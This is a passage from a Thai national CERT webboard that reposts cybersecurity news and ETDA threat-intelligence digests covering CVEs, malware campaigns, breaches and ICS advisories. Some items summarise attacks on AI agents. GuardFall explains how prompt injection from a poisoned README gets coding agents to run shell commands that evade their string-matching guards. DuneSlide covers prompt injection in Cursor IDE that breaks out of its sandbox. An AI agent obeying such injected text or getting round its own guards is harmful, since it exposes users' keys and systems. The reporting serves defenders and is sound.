NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ
    1. หน้าแรก
    2. NCSA_THAICERT
    3. กระทู้
    • รายละเอียด
    • ติดตาม 0
    • คนติดตาม 3
    • กระทู้ 2,334
    • กระทู้ 2,335
    • ดีที่สุด 0
    • Controversial 0
    • กลุ่ม 2

    โพสต์ถูกสร้างโดย NCSA_THAICERT

    • พบบอตเน็ต RustDuck โจมตีเราเตอร์และอุปกรณ์ IoT เพื่อใช้โจมตี DDoS

      พบบอตเน็ต RustDuck โจมตีเราเตอร์และอุปกรณ์ IoT เพ.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 07f56ace-61e8-40d1-a9ab-c344b4ffda72-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • แฮกเกอร์ขโมยข้อมูลลูกค้า Aflac Japan กว่า 4.38 ล้านราย หลังเข้าถึงระบบนาน 10 วัน

      แฮกเกอร์ขโมยข้อมูลลูกค้า Aflac Japan กว่า 4.38 ล้านร.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand d6f93f28-c575-46a7-a467-e8b3c6e92ab6-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • นักวิจัยพบการโจมตีรูปแบบใหม่ BioShocking หลอกลวงเบราว์เซอร์ AI ให้ขโมยข้อมูลสำคัญของผู้ใช้งาน

      นักวิจัยพบการโจมตีรูปแบบใหม่ BioShocking หลอกลวง.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand c5fe416a-2a2f-41d6-87da-6d743151cc32-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • CISA เพิ่มช่องโหว่ที่ถูกใช้โจมตี 1 รายการลงในแคตตาล็อก

      เมื่อวันที่ 1 กรกฏาคม 2569 Cybersecurity and Infrastructure Security Agency (CISA) ได้เพิ่มช่องโหว่ใหม่ 1 รายการลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) จากหลักฐานที่พบว่ามีการโจมตีใช้งานจริงแล้ว มีรายละเอียดดังนี้

      CVE-2026-45659 Microsoft SharePoint Server Deserialization of Untrusted Data Vulnerability

      ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

      อ้างอิง

      https://www.cisa.gov/news-events/alerts/2026/07/01/cisa-adds-one-known-exploited-vulnerability-catalog

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 72834537-e9af-46a4-822b-177d06cf2452-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 02 July 2026

      New Tooling

      • Nika: Open-Source Code Analysis Tool
        "Many serious security bugs in web applications sit across several files at once. Request data enters through a controller, moves through data objects and service layers, and turns dangerous only when it reaches a sensitive operation such as a database query or a file action. A scanner that reads one file at a time can miss that path entirely. Nika, an open-source tool from the payments company PhonePe, works on that problem for Java microservices. It performs cross-file taint analysis, tracing attacker-controlled input across application layers to find out whether that input reaches a security-sensitive sink."
        https://www.helpnetsecurity.com/2026/07/01/nika-open-source-code-analysis-tool/
        https://github.com/PhonePe/nika

      Vulnerabilities

      • DuneSlide: Two Critical RCE Vulnerabilities Via Zero-Click Prompt Injection In Cursor IDE
        "Cato AI Labs has discovered two critical remote code execution (RCE) vulnerabilities in Cursor IDE, the popular development environment which, according to Cursor, is used by over half of the Fortune 500. Both RCE vulnerabilities, which we refer to as “DuneSlide,” achieved a 9.8 CVSS score, and involve breaking out of the IDE’s sandbox environment and were assigned CVE IDs CVE-2026-50548 and CVE-2026-50549. Together, these vulnerabilities show how prompt injection can reach beyond the LLM layer and expose classical vulnerabilities in code paths that were not traditionally considered part of the attack surface."
        https://www.catonetworks.com/blog/duneslide-two-critical-rce-vulnerabilities/
        https://thehackernews.com/2026/07/critical-cursor-flaws-could-let-prompt.html
      • Google Patches 382 Chrome Vulnerabilities
        "Google on Tuesday announced the release of Chrome 151 with patches for 382 vulnerabilities, the vast majority of which were discovered by the tech giant itself. Of the 382 vulnerabilities, 358 were found by Google. The company has discovered and patched hundreds of Chrome flaws in recent months, a surge likely driven by AI. However, it has shared no details on which specific AI tools are driving the surge. Fifteen of the newly patched vulnerabilities have been assigned a ‘critical’ severity rating, and 67 have been rated ‘high severity’. Of the remaining flaws, 169 have a ‘medium’ and 131 have a ‘low’ severity rating."
        https://www.securityweek.com/google-patches-382-chrome-vulnerabilities/
        https://www.malwarebytes.com/blog/bugs/2026/07/chrome-needs-another-whopper-update-to-fix-382-security-fixes
        Caught In The Octopus Trap: Unauthenticated RCE In Argo CD With CodeQL
        "Synacktiv has discovered an unauthenticated arbitrary code execution vulnerability in ArgoCD's repo-server component, potentially allowing full cluster compromise. This article explains how the vulnerability was identified using CodeQL, details the exploitation process to gain control over the underlying Kubernetes cluster, and introduces a tool for automating the attack."
        https://www.synacktiv.com/en/publications/caught-in-the-octopus-trap-unauthenticated-rce-in-argo-cd-with-codeql
        https://thehackernews.com/2026/07/unpatched-argo-cd-repo-server-flaw.html
      • Over 900 Oracle E-Business Instances Exposed To Ongoing Attacks
        "Over 900 Oracle E-Business Suite (EBS) instances have been found exposed online amid ongoing attacks exploiting a critical security flaw. The vulnerability (tracked as CVE-2026-46817) was found in the File Transmission component of EBS's Oracle Payments product and allows malicious actors without privileges and with HTTP network access to take over vulnerable systems through low-complexity attacks. Oracle has patched this flaw with security updates released as part of its May 2026 Critical Security Patch Update and urged customers to patch their systems immediately."
        https://www.bleepingcomputer.com/news/security/over-900-oracle-e-business-instances-exposed-to-ongoing-attacks/
        https://cyberscoop.com/oracle-ebs-critical-vulnerability-exploited/
        https://securityaffairs.com/194599/security/oracle-e-business-suite-flaw-under-active-attack-950-systems-exposed.html
      • Progress Kemp LoadMaster Vulnerability Targeted (CVE-2026-8037)
        "Beginning on June 29th, 2026, eSentire’s Threat Response Unit (TRU) identified exploitation attempts targeting the critical Progress Kemp LoadMaster vulnerability CVE-2026-8037. The vulnerability was initially disclosed on June 4th and functional Proof-of-Concept (PoC) exploit code was released on June 29th. CVE-2026-8037 (CVSS: 9.8), is an OS Command Injection Remote Code Execution (RCE) vulnerability which allows an unauthenticated attacker to execute arbitrary commands on the LoadMaster appliance. As active exploitation attempts have been identified, it is critical that organizations apply the relevant security patches immediately."
        https://www.esentire.com/security-advisories/progress-kemp-loadmaster-vulnerability-targeted-cve-2026-8037
        https://thehackernews.com/2026/07/latest-progress-kemp-loadmaster-pre.html

      Malware

      • No (Bad) CAP: Inside An Ongoing LSHIY Password Spray Attack
        "Huntress is observing a massive, ongoing, automated password spray attack against Microsoft's Azure command-line interface (CLI), originating from an IPv6 address range controlled by internet infrastructure provider LSHIY LLC, AS32167. Between June 12 through June 26, the threat actor made more than 81 million login attempts against Huntress customer accounts and successfully compromised at least 78 Microsoft accounts. Last week, the number and effectiveness of the compromises surged, continuing a concerning trend in the rapid expansion of these types of attacks. Notably, many of these organizations had Conditional Access policies, but the way they were configured didn't cover the techniques used by the threat actors in this campaign."
        https://www.huntress.com/blog/lshiy-password-spray-attack
        https://thehackernews.com/2026/07/azure-cli-password-spray-hits-at-least.html
        https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-365-accounts-with-81-million-login-attempts/
        https://www.securityweek.com/massive-password-spray-campaign-targeting-azure-cli/
        https://www.bankinfosecurity.com/azure-password-spraying-attack-bypasses-mfa-defenses-a-32128
        https://securityaffairs.com/194588/uncategorized/azure-cli-targeted-in-lshiy-password-spray-campaign-across-64-orgs.html
      • Phantom Squatting: AI-Hallucinated Domains As a Software Supply Chain Vector
        "Unit 42 researchers found that large language models (LLMs) consistently hallucinate web domains for legitimate brands. Adversaries are actively weaponizing this vector by registering these nonexistent domains to intercept traffic generated by AI systems. We call this phenomenon phantom squatting, and it poses a significant risk to the software supply chain. Our proactive monitoring of registration for high-priority hallucinated domains yielded real-world detections across multiple sectors. We were able to predict use of these domains from 18–51 days ahead of adversary registration."
        https://unit42.paloaltonetworks.com/phantom-squatting-hallucinated-web-domains/
        https://thehackernews.com/2026/07/phantom-squatting-uses-ai-hallucinated.html
        https://www.darkreading.com/endpoint-security/phantom-squatting-ai-driven-supply-chain-threat
      • ClickFix: The Gift That Keeps On Giving
        "In the beginning of June I presented the session ClickFix: The Gift That Keeps On Giving at OrangeCon. ClickFix emerged around 2024 and saw a 517% increase in 2025 as described by SANS, the effectiveness of this technique is something we will have to deal with for the upcoming years. Before diving into technical details, it’s important to understand why ClickFix is so effective. The attack exploits fundamental user behaviors and training:"
        https://kqlquery.com/posts/clickfix-gift-that-keeps-on-giving/
        https://thehackernews.com/2026/07/researcher-analyzes-3000-live-clickfix.html
      • SOCRadar Links FortiBleed Campaign To INC And Lynx Ransomware Operations
        "SOCRadar’s Threat Research Unit (STRU) has linked the FortiBleed credential-harvesting campaign to two active ransomware-as-a-service operations, INC Ransom and Lynx. An operator tied to FortiBleed’s infrastructure was found actively working negotiation panels for both groups, tying mass FortiGate credential theft directly to ransomware deployment for the first time."
        https://socradar.io/blog/fortibleed-inc-lynx-ransomware-link/
        https://www.bleepingcomputer.com/news/security/fortibleed-credential-theft-campaign-linked-to-lynx-ransomware/
      • Don’t Eat The ChocoPoCs! How Vulnerability Researchers Were Repeatedly Targeted By Trojanised Exploits
        "This blogpost is a collaboration between YesWeHack and Sekoia TDR, analysing an undocumented supply chain attack that targets vulnerability researchers and pentesters via lure CVE PoC repositories. Our analysis shows that this vector has already been used in malicious PoCs, seeking to compromise pentesting tools, since late 2025. Because the malware and its C2 infrastructure are still active, we strongly advise against running any of the PoCs code or installing the malicious packages."
        https://www.sekoia.com/blog/dont-eat-the-chocopocs-how-vulnerability-researchers-were-repeatedly-targeted-by-trojanised-exploits
        https://www.bleepingcomputer.com/news/security/new-chocopoc-malware-targets-researchers-via-trojanized-poc-exploits/
      • When AI Invents The Attack: Browser-Native Ransomware
        "Check Point Research recently uncovered something that changes how we think about AI-assisted threats: a malware sample in which an AI model independently connected a theoretical browser risk to a working ransomware technique, with no exploit, no app installation, and no technical expertise required from the attacker."
        https://blog.checkpoint.com/research/when-ai-invents-the-attack-browser-native-ransomware/
        https://research.checkpoint.com/2026/browser-only-ransomware-from-llm-hallucinations-to-a-practical-attack-technique/
        https://thehackernews.com/2026/07/ai-generated-browser-ransomware-abuses.html
        https://www.theregister.com/security/2026/07/01/somebody-told-deepseek-to-build-in-browser-ransomware-and-it-gleefully-complied/5265311
      • ARToken: Inside An EvilTokens Affiliate Panel Targeting Microsoft 365
        "Cisco Talos identified a fully-featured phishing-as-a-service (PhaaS) operator panel, branded "ARToken," that shares infrastructure, API contracts, and operational patterns with the EvilTokens platform documented by Sekoia and Microsoft in early 2026. The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token (PRT) persistence, email access, business email compromise (BEC) operations, and SharePoint exfiltration — all accessible to operators through a React-based dashboard."
        https://blog.talosintelligence.com/artoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365/
        https://cyberscoop.com/artoken-bec-platform-cisco-talos/
        https://www.theregister.com/cyber-crime/2026/07/01/eviltokens-device-code-phishing-kit-totally-more-evil-than-we-all-thought/5265409
        https://www.helpnetsecurity.com/2026/07/01/artoken-phishing-panel-microsoft-365-accounts/
      • Analysis Of Ongoing Ousaban Attacks Targeting The Iberian Peninsula
        "In May 2026, FortiGuard Labs identified an attack targeting users in Spain and Portugal involving the banking Trojan Ousaban. This malware has been active in Brazil and is spread through an MSI downloader. The malicious payload involves a DLL file that is run via DLL side-loading or process injection. In this campaign, the threat actor primarily targets users in Spain and Portugal. Figure 1 shows how the attack unfolds. The phishing PDF tricks victims into visiting a malicious webpage that scans the user's environment. If they are in Spain or Portugal, the webpage downloads a VBS file to kickstart the next part of the attack. The final payload is an EXE file that is dropped onto the victim’s computer and executed by the VBS script."
        https://www.fortinet.com/blog/threat-research/analysis-of-ongoing-ousaban-attacks-targeting-the-iberian-peninsula
        https://thehackernews.com/2026/07/ousaban-banking-trojan-targets-iberian.html
        https://www.infosecurity-magazine.com/news/ousaban-banking-trojan-spain/
      • Phishing In The Balkans: Fake Traffic Fines, Real Losses
        "Government services are increasingly relying on SMS as a channel to send notifications such as fines, toll reminders and payment alerts. It is fast, convenient, and the general public tends to trust a text from an official sender. This trust is what scammers are looking to take advantage of. Group-IB researchers have been tracking a smishing campaign that is impersonating the identity of Putevi Srbije, Serbia’s state road authority. Victims get a text claiming they have an unpaid traffic fine. They click a link. They land on a fake government website that looks real enough to fool most people. They enter their card details. And then the money is gone."
        https://www.group-ib.com/blog/balkans-fake-traffic-fines-phishing/
      • Fake Interpol Investigation Emails Target Small Businesses With Ransomware
        "Think your small business is too small to be targeted by ransomware? That's precisely the assumption cybercriminals hope you'll make. Bitdefender Antispam researchers have uncovered a phishing campaign targeting small businesses across Europe, Asia, the Middle East, and the United States with fake investigation emails impersonating law enforcement officials. The messages claim to contain evidence of suspicious company activity, but there’s a catch: The attached ‘evidence’ is actually ransomware."
        https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-interpol-emails-serve-ransomware
        https://hackread.com/fake-interpol-investigation-emails-ransomware-small-businesses/
      • The SOC Files: ScreenConnect Masked As Freeware. An Inside Look At a Large-Scale Campaign
        "To access compromised systems, threat actors frequently abuse legitimate remote monitoring tools. At first glance, these utilities rarely raise red flags: they are signed with valid digital certificates, often allowlisted under corporate IT policies, and fully supported by OS vendors. However, they grant attackers the ability to harvest data from target devices, drop malware, and move laterally across the network."
        https://securelist.com/tr/the-soc-files-screenconnect-campaign-with-asyncrat/120472/
        https://thehackernews.com/2026/07/seo-poisoned-software-sites-abuse.html
      • Veil#Drop: Blogspot-Hosted PowerShell Loader Delivers PureLog Stealer Through XOR-Encoded In-Memory .NET Payloads
        "Veil#Drop is a sophisticated multi-stage malware delivery framework that combines social engineering, compromised websites, malicious JavaScript launchers, PowerShell download cradles, and trusted cloud-hosted infrastructure to deploy PureLog Stealer entirely in memory. The infection chain begins with a deceptively named JavaScript file masquerading as a document (e.g., transcript.pdf.js), which executes through Windows Script Host and launches PowerShell with execution policy bypasses enabled. PowerShell then retrieves additional stages from attacker-controlled Blogspot pages, abusing Google’s trusted infrastructure to blend malicious traffic with legitimate web activity and evade reputation-based security controls."
        https://www.securonix.com/blog/veildrop-blogspot-hosted-powershell-loader/
        https://thehackernews.com/2026/07/veildrop-malware-chain-uses-blogger.html
        https://www.infosecurity-magazine.com/news/veil-drop-blogspot-purelog-stealer/
      • UNC1151 Phishing Email Targeting Belarusian Politician Points To Multi-National Campaign
        "UNC1151, also referred to as Ghostwriter and various other names, is a threat actor whose interests align with those of the government of Belarus (and, by extension, Russia, due to Russia and Belarus’s frequently aligned interests). The group first rose to prominence in 2020 when it hacked into legitimate media sites to publish fake stories (which earned it the name ‘Ghostwriter’). Since then it has remained very active, mostly in spear-phishing campaigns targeting individuals in Poland and Ukraine."
        https://censys.com/blog/unc1151-phishing-email-campaign/

      Breaches/Hacks/Leaks

      • Kubota Says Hackers Had Month-Long Access To Network Systems
        "Kubota North America Corporation disclosed that hackers had access to some of its network systems for more than a month earlier this year. Following an investigation into the incident, the company determined that between March 16 and April 20 the threat actor accessed files with personal information for employees and their dependents. Kubota is a Japanese industrial manufacturer known for its agricultural and construction equipment. It operates in 120 countries, employs more than 52,000 people, and has a reported annual revenue of $20 billion."
        https://www.bleepingcomputer.com/news/security/kubota-says-hackers-had-month-long-access-to-network-systems/
      • Hackers Breached DHS Information-Sharing Network, People Familiar Say
        "A key Department of Homeland Security information-sharing database was accessed by an unknown threat actor in recent weeks, potentially exposing sensitive data exchanged between federal, state, local and industry partners, according to two people familiar with the matter. DHS investigators are probing the intrusion of the Homeland Security Information Network, said both people, who spoke on the condition of anonymity because the incident is sensitive. The hackers’ affiliation and whether any documentation was pilfered from the system are both unclear."
        https://www.nextgov.com/cybersecurity/2026/06/hackers-breached-dhs-information-sharing-network-people-familiar-say/414534/
        https://www.bleepingcomputer.com/news/security/dhs-confirms-hackers-breached-hsin-info-sharing-platform/

      General News

      • What a Financial Planner Taught Me About Cybersecurity
        "When I spoke at a recent cybersecurity awareness event for financial planners and tax advisors, the audience really engaged with the subject. As happens at conferences the world over, people often come up to speakers to ask follow-up questions, or just give their feedback about points made during the presentation. This time, it struck me how many of them said they had been scared by what they heard during my talk."
        https://www.helpnetsecurity.com/2026/07/01/raising-cybersecurity-awareness-for-non-experts/
      • This Supercomputer Encrypts Your Data Even While It’s Running It
        "Most people who handle sensitive data already encrypt it in two places. They lock it down when it sits on a hard drive, and they lock it down when it moves across a network. There has always been a third moment that stayed open. The instant a computer pulls that data into memory to work on it, the protection drops away. For a few seconds or a few hours, the information sits in the open, readable by anyone with deep enough access to the machine. A research team at the University of Cologne built a supercomputer that closes that gap. The system is called RAMSES, and it keeps data scrambled even during the moment of processing."
        https://www.helpnetsecurity.com/2026/07/01/confidential-computing-hpc-research/
        https://arxiv.org/pdf/2606.27919
      • AI-Generated Code Risks Reach Security, Legal, And Compliance Teams
        "Most engineering organizations write code with AI, and a good number of them keep that code away from customers. A Flux survey of engineering leaders and practitioners found that nearly half run AI-generated code in production. Almost every company in the sample uses AI somewhere in development, with under 5% reporting no plans to adopt it within a year. Teams reach for AI on repetitive work first. It writes documentation, fills out unit tests, and handles simple functions, the kind of tasks where a mistake stays small and easy to catch. Adoption thins out as the stakes rise."
        https://www.helpnetsecurity.com/2026/07/01/ai-generated-code-risks-security/
      • The Near Real-Time Patching Era Has Arrived
        "Cybersecurity teams need to prepare now for a forthcoming onslaught of vulnerabilities that will need to be remediated much faster than ever before. The number of vulnerabilities being discovered and reported has already been steadily increasing over the last few months. However, with further advances in artificial intelligence (AI), most notably in the form of Mythos and ChatGPT 5.6 models from Anthropic and OpenAI, the overall number of vulnerabilities is only going to increase. Right now, however, not all the vulnerabilities being remediated lately have actually been formally reported, so limited access to the latest AI models might be working in favor of cybersecurity teams."
        https://blog.barracuda.com/2026/06/30/near-real-time-patching-ai-application-security
      • The Platform You Trust Is The Platform They Target
        "Cofense Intelligence is observing a clear shift in phishing operations: threat actors are moving beyond broad, one-size-fits-all campaigns and adopting platform-aware delivery that adapts to the victim’s device, browser, and environment. What began as simple Windows-focused malware distribution campaigns has evolved into more sophisticated campaigns that can selectively deliver credential phishing, remote access tools, or malware across Windows, MacOS, and Android. This trend reflects a broader strategic change in the threat landscape, one that is designed to increase the likelihood of compromise, expand target coverage, and improve threat actor return on investment."
        https://cofense.com/blog/the-platform-you-trust-is-the-platform-they-target
        https://www.darkreading.com/application-security/phishing-campaigns-auto-adapt-victims-device-os
      • OpenClaw: Risks For The Users And How To Mitigate Them
        "OpenClaw, which was previously known as Clawdbot and Moltbot, is today one of the most successful and fast‑growing ecosystems for AI agents, recognized worldwide. The project quickly became popular with users because of its flexibility and ability to solve fairly complex tasks that previously required a lot of time for automation and execution. A dedicated marketplace appeared quickly after the project started gaining traction, where developers and users began publishing tools that integrate with OpenClaw. Currently, employees all over the world use OpenClaw to automate their tasks, often unaware of risks this practice introduces to them and their employers."
        https://securelist.com/openclaw-security/120484/
      • Alleged Member Of Criminal Cyber Hacking Group “Scattered Spider” Arrested In Finland And Extradited To The United States
        "An alleged member of the criminal cyber hacking group Scattered Spider has been arrested in Finland and extradited to the United States to face federal criminal conspiracy charges in the Northern District of Illinois. A criminal complaint unsealed Tuesday charges Peter Stokes, 19, a dual citizen of the United States and Estonia, with conspiracy, computer intrusion, and fraud. Stokes was arrested by Finnish authorities in April pursuant to an Interpol Red Notice and extradited to the United States last week. He made an initial appearance on Tuesday in federal court in Chicago and was ordered to remain in law enforcement custody."
        https://www.justice.gov/opa/pr/alleged-member-criminal-cyber-hacking-group-scattered-spider-arrested-finland-and-extradited
        https://thehackernews.com/2026/07/19-year-old-scattered-spider-suspect.html
        https://therecord.media/teen-suspect-in-scattered-spider-hacks-extradited-to-us
      • Huntress CEO Says Threat Hunter Used 'poor Judgment' In Alerting Ransomware Crim About Law Enforcement Probe
        "Huntress CEO Kyle Hanslovan said he is aware of “questionable, long-term threat actor communications” between a threat hunter who is still employed with the security firm and a cybercriminal, and called this “poor judgment.” “In one particular exchange, our current teammate disclosed to a threat actor that law enforcement had reached out to them about the threat actor,” Hanslovan said in a blog post, addressing a former employee’s accusations that the current Huntress analyst is an insider threat to the company. “While this disclosure was not illegal, it reflected poor judgment,” he wrote."
        https://www.theregister.com/security/2026/06/30/huntress-ceo-says-threat-hunter-used-poor-judgment-in-alerting-ransomware-crim-about-law-enforcement-probe/5264532

      อ้างอิง

      Electronic Transactions Development Agency (ETDA) 14bace64-e6e7-44bf-be79-24a751021c1c-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • พบการโจมตีช่องโหว่ SimpleHelp RMM ติดตั้ง Djinn Stealer ขโมยข้อมูลสำคัญ

      พบการโจมตีช่องโหว่ SimpleHelp RMM ติดตั้ง Djinn Stealer ขโมย.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand bd619f33-fe95-4d60-99ad-9c6ea701562c-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • Nissan แจ้งเหตุข้อมูลพนักงานรั่วไหล เชื่อมโยงการโจมตีช่องโหว่ Zero-Day ใน Oracle PeopleSoft

      Nissan Americas แจ้งเหตุข้อมูลพนักงานรั่วไหล เชื่อม.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand d77064bd-739e-49bf-935c-88b46ee09254-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ตรวจพบส่วนขยาย Chrome ปลอมแอบอ้างเป็น Perplexity AI ดักจับข้อมูลการค้นหาและข้อมูลการพิมพ์ของผู้ใช้งาน

      ตรวจพบส่วนขยาย Chrome ปลอมแอบอ้างเป็น Perplexity AI ดัก.png

      สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand 881835c8-edf5-4944-bdc0-955e9b891af3-image.png

      โพสต์ใน Cyber Security News
      NCSA_THAICERTN
      NCSA_THAICERT
    • ETDA Cyber Threat Intelligence 01 July 2026

      Healthcare Sector

      • OFFIS DCMTK Toolkit
        "Successful exploitation of these vulnerabilities could allow an attacker to write files, access unauthorized information, exhaust memory, or crash affected DCMTK client or server processes."
        https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01
        https://www.bankinfosecurity.com/dicom-toolkit-bugs-raise-medical-imaging-security-risks-a-32114

      Industrial Sector

      • StoneFly Storage Concentrator
        "Successful exploitation of these vulnerabilities could allow attackers to gain broad unauthorized access, execute arbitrary commands with root privileges, steal sensitive data, and perform actions on behalf of legitimate users across interconnected systems."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06
      • Delta Electronics DVP12SE PLC
        "Successful exploitation of these vulnerabilities could allow an attacker to remotely issue commands, modify operational values, interfere with control logic, and alter device behavior without authentication or privilege enforcement."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-07
      • Mitsubishi Electric MELSOFT Update Manager SW1DND-UDM-M
        "Successful exploitation of these vulnerabilities could allow a local attacker to tamper with or destroy information in the affected product, cause a denial-of-service condition in the affected product, or execute arbitrary code when a specially crafted archive file is decompressed by the 7-Zip component included in MELSOFT Update Manager."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-01
      • Frangoteam FUXA SCADA/HMI
        "Successful exploitation of this vulnerability could allow an unauthenticated remote attacker to enumerate all user accounts and role assignments on a FUXA SCADA/HMI instance."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02
      • Schneider Electric EcoStruxure IT Data Center Expert
        "Schneider Electric is aware of a vulnerability in its EcoStruxure™ IT Data Center Expert. The EcoStruxure™ IT Data Center Expert product is a scalable monitoring software that collects, organizes, and distributes critical device information providing a comprehensive view of equipment. Failure to apply the remediation provided below may risk information disclosure."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-03
      • Schneider Electric EasyLogic T150 And Saitel DP RTU
        "Successful exploitation of these vulnerabilities can allow an attacker to cause unauthorized access and exposure of sensitive information when the unauthenticated attacker accesses credentials stored within firmware or system files."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-04
      • XZ Utils Vulnerability Impacting B&R Products
        "An update is available that resolves vulnerability in the product versions listed as affected in the advisory. An attacker who successfully exploited this vulnerability could cause the product to stop or corrupt memory data."
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-05

      Vulnerabilities

      • Enterprise Tech In, Shell Out (Progress Kemp LoadMaster Uninitialized Heap To Pre-Auth RCE CVE-2026-8037)
        "Welcome back to another watchTowr Labs blog post. This time, we're looking at Progress Kemp LoadMaster, a load balancer that sits at the edge of a lot of enterprise networks. Edge appliances have a habit of becoming the way in rather than the thing keeping people out, and CVE-2026-8037 keeps that streak alive: a pre-authentication Remote Code Execution vulnerability accessible to anyone who can access the API. So, in probably a predictable turn of events, we're back doing what we do best."
        https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/
        https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html
      • Adobe Security Bulletin
        "Adobe has released security updates for ColdFusion versions 2025 and 2023. These updates resolves critical and important vulnerabilities that could lead to arbitrary code execution, privilege escalation, arbitrary file system read, and security feature bypass. Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates."
        https://helpx.adobe.com/security/products/coldfusion/apsb26-68.html
      • Citrix Patches a New NetScaler Flaw With Echoes Of CitrixBleed
        "Citrix published a security bulletin Tuesday disclosing six vulnerabilities in NetScaler ADC and NetScaler Gateway appliances, including a high-severity memory disclosure flaw that researchers say belongs to a vulnerability class first identified in the 2023 incident known as CitrixBleed. The company rated the overall bulletin severity as high and assigned CVSS scores ranging from 6.9 to 8.8 across the six CVEs. Citrix said customers should install the updated builds and, in one case, manually adjust a configuration parameter even after patching."
        https://cyberscoop.com/citrix-netscaler-flaw-cve-2026-8451-citrixbleed/
        https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696604
      • CISA: Windows BlueHammer Flaw Now Exploited By Ransomware Gangs
        "CISA confirmed on Monday that ransomware gangs have begun exploiting a high-severity Microsoft Defender privilege escalation vulnerability that has previously been abused in zero-day attacks. Dubbed BlueHammer, the security flaw (CVE-2026-33825) was leaked by a security researcher known as "Nightmare Eclipse" in early April, together with proof-of-concept exploit code, in protest at how the Microsoft Security Response Center (MSRC) handles the disclosure process. "Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally," Microsoft explains in a security advisory."
        https://www.bleepingcomputer.com/news/security/cisa-windows-bluehammer-flaw-now-exploited-by-ransomware-gangs/
        https://www.securityweek.com/bluehammer-vulnerability-exploited-in-ransomware-attacks/
      • AirDrop And Quick Share Flaws Let Nearby Attackers Trigger Crashes And Bypass Checks
        "Two researchers have found six security flaws in AirDrop and Quick Share, the wireless features that beam files between nearby devices with no cables or shared network. An attacker within wireless range, with just a laptop and no prior connection, can crash the sharing service on a Mac or iPhone set to receive from anyone, with no tap or prompt. The same research found Quick Share flaws that bypass Samsung's session checks and trigger a potentially exploitable crash in Google's Windows app."
        https://thehackernews.com/2026/06/airdrop-and-quick-share-flaws-let.html
        https://www.helpnetsecurity.com/2026/06/30/apple-airdrop-google-samsung-quick-share-vulnerabilities/
      • Apple Patches 30+ iOS, MacOS, Safari Flaws, Including AI-Discovered WebKit Bugs
        "Apple on Monday released security updates for iOS, macOS, and the Safari web browser to address over three dozen flaws, including four vulnerabilities in WebKit that were discovered using artificial intelligence (AI) tools like Anthropic Claude and OpenAI Codex Security."
        https://thehackernews.com/2026/06/apple-patches-30-ios-macos-safari-flaws.html
        https://support.apple.com/en-us/100100
        https://securityaffairs.com/194476/security/apple-fixes-webkit-flaws-in-ios-and-macos-with-help-from-ai-tools.html
        https://www.malwarebytes.com/blog/news/2026/06/update-time-apple-releases-security-patches-for-ios-macos-tahoe-safari
      • GuardFall: a Universal Shell Injection Vulnerability In Open-Source AI Agents
        "AI coding agents and computer use agents run shell commands with your full account authority: your SSH keys, your cloud credentials, everything in $HOME. Most of them gate that power behind a guard that matches the command string against a list of dangerous patterns. But the string being inspected is different from the command executed. A guard inspects raw text, while system shell (bash) expands, unquotes, and rewrites text before running it. So, when an agent processes untrusted content (for example, an npm package with a poisoned README), the prompt injection can make it run a command that passes all the execution filters. This tactic is not new. It’s a decades-old shell quoting bypass, well known in the security literature. It succeeds against today’s most-used open-source agents. We first met this in the open-source NousResearch/hermes-agent project and surveyed ten others against the same bypass class."
        https://adversa.ai/blog/opensource-ai-coding-agents-shell-injection-vulnerability/
        https://thehackernews.com/2026/06/guardfall-exposes-open-source-ai-coding.html
        https://www.securityweek.com/decades-old-bash-tricks-expose-ai-coding-agents-to-supply-chain-attacks/

      Malware

      • How Ransomware Syndicates Weaponize Corporate-Style Organization
        "Similar to the events that unfolded with the Conti ransomware group’s demise in 2022, leaked internal chat logs of the Black Basta cybercrime group last year gave us a peek behind the curtain of modern ransomware operations. We found that these groups have continued to evolve into highly sophisticated and organized syndicates, taking a corporate-style approach to extortion. According to our analysis, Black Basta members carefully studied victims to launch advanced phishing and malware campaigns, exploit vulnerabilities and intimidate victims into paying via panic-triggering tactics."
